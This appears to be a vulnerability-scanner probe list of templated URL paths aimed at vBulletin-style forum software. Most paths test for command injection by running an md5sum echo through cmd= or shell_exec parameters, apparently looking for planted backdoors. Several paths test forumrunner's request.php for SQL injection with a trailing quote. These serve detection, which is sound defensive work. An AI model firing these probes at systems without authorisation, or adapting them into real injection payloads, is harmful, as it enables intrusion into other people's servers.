/arcade.php?act=Arcade&do=stats&comment=a&s_id=1
/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
